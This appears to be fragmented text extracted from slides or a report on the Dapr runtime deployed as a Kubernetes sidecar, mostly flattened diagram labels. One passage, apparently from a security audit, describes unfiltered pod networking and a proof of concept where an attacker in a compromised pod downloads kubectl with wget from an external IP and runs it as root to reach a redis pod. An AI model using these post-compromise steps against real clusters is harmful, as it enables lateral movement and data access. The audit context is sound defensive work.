Cloud and Edge State of Cloud Native Application Platforms The cloud is going serverless, but K8s is the infrastructure on-prem and on-edge App developers need to know and code for each infrastructure Job Namespace Secret Volume Endpoint ConfigMap VolumeAttach CronJob Deployment ReplicaSet Pod Service Task Worker cron autoscale ingress canary Separation of concerns Allows application Application Dapr API Dapr API Messaging Load and save state Service code B Service code A Pod C O N T A I N E R Service code C O N T A I N E R Sidecar Dapr Kubernetes-hosted Publish and subscribe

Job Namespace Secret Volume Endpoint ConfigMap VolumeAttach CronJob Deployment ReplicaSet Pod Service autoscale ingress Task Worker cron canary Describes application components and operations bindings Input/output Pod C O N T A I N E R Placement Pod C O N T A I N E R Sidecar injector Pod C O N T A I N E R Operator Pod C O N T A I N E R Application code 1 Pod Update component changes and subscribe State stores Resource bindings Input/output Pod C O N T A I N E R Placement Pod C O N T A I N E R Sidecar injector Pod C O N T A I N E R Operator Dapr API HTTP or gRPC Use components

nor filtered by default ingress or egress rules. If an attacker was able to gain a foothold on the pod, running the Python and nodejs sample applications in the default namespace, the attacker would be enable the attacker to establish a session to the master-0 redis pod. PoC Attacker has gained shell access to the Python application pod. • Using wget, the attacker downloads the kubectl binary wget (216.58.208.112:443) kubectl 100% |**************| 51107k 0:00:00 ETA • Since the pod context-user is root, the attacker adds the execution bit to the downloaded kubectl binary and queries

on Kubernetes. When using Dapr with Kubernetes, Dapr is deployed as a sidecar container in the same pod as the userʼs application. When running Dapr on a virtual machine, Dapr runs as a separate sidecar